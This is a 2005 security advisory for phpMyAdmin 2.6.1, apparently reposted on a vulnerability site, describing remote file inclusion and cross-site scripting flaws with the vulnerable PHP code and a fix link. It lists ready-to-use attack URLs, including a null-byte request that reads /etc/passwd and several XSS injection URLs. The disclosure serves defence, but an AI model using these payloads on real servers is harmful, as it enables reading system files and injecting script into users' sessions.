phpMyAdmin 2.6.1 Remote file inclusion and XSS

2005.09.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 24.2.2005 - --- 0.Description --- phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. - --- 1. Remote file inclusion --- 1.0 This bug exist in css/phpmyadmin.css.php. You can include files. Error exist in Code: - ------ $tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' . $theme . '/css/theme_right.css.php'; if (@file_exists($tmp_file)) { include($tmp_file); } // end of include theme_right.css.php - ------ And now you can get files. For exemple: http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00 http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00 etc. 1.1 Or next include is in libraries/database_interface.lib.php Code: - --- 18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php'); - --- For exemple: http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 Error message : - --------------- Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php) [function.main]: failed to open stream: No such file or directory in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18 Fatal error: main() [function.require]: Failed opening required './libraries/dbi/cXIb8O3.dbi.lib.php' (include_path='.:') in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18 - --------------- Or if you want and if you see php error and register_globals=on, can you make xss with php buq. For Exemple: http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E - --- 2. XSS aka Cross Site Scripting --- If register_globals=On: 2.0 http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_serv er_left=MyToMy&strServer=[XSS%20code] http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[Bgcol orOne]=777777%22%3E%3CH1%3E[XSS%20code] http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServer Choice=%3CH1%3EXSS 2.1 http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]= Mi&bgcolor=%22%3E[XSS%20code] http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]= Mi&row_no=%22%3E[XSS%20code] 2.2 http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS] and more in this file. 2.3 http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS] and more in this file. - --- 3. How to fix --- CVS or https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >> libraries/grab_globals.lib.php or wait for new version.. - --- 4.Contact --- Author: Maksymilian Arciemowicz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top